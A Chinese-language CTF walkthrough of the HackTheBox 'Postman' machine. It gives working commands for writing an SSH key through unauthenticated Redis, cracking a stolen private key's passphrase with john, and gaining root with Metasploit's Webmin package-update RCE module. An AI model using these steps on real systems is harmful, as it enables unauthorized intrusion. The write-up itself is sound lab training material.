端口扫描
nmap -sC -sV -oA path postman.htb
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
发现19.1版本的webmin,但是多次测试之后发现无法似乎未开启密码重置功能。
上网看了一圈 发现nmap未扫到的redis端口
PORT STATE SERVICE VERSION
6379/tcp open tcpwrapped
redis 未授权访问
生成ssh公钥,写入redis
生成ssh公钥
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
写入redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx
连接redis,导入公钥
连接redis
redis-cli -h 10.10.10.160
导入公钥
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save
ssh连接redis
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
查看一下user.txt位置
redis@Postman:/opt$ locate user.txt
/home/Matt/user.txt
redis@Postman:/opt$ ls -la /home/Matt/user.txt
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt
获得Matt私钥
发现需要获得Matt密码,通过nmap扫描结果可以知道靶机开启了ssh,所以找找Matt的ssh私钥
redis@Postman:/opt$ locate id_rsa*
/opt/id_rsa.bak
redis@Postman:/opt$ ls -la /opt/id_rsa.bak
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
密码爆破
使用john在攻击机上进行密码爆破
python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass
获得Matt用户密码:computer2008
切换用户,获取flag
redis@Postman:/opt$ su Matt
Password:
Matt@Postman:~$ wc -c user.txt
33 user.txt
获取root权限
发现webmin为19.1版本,使用msf中的模块获取root
msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008
password => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
值得注意的是需要设置 ssl 为 true
否则无法建立连接
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
获得flag
wc -c /root/root.txt
33 /root/root.txt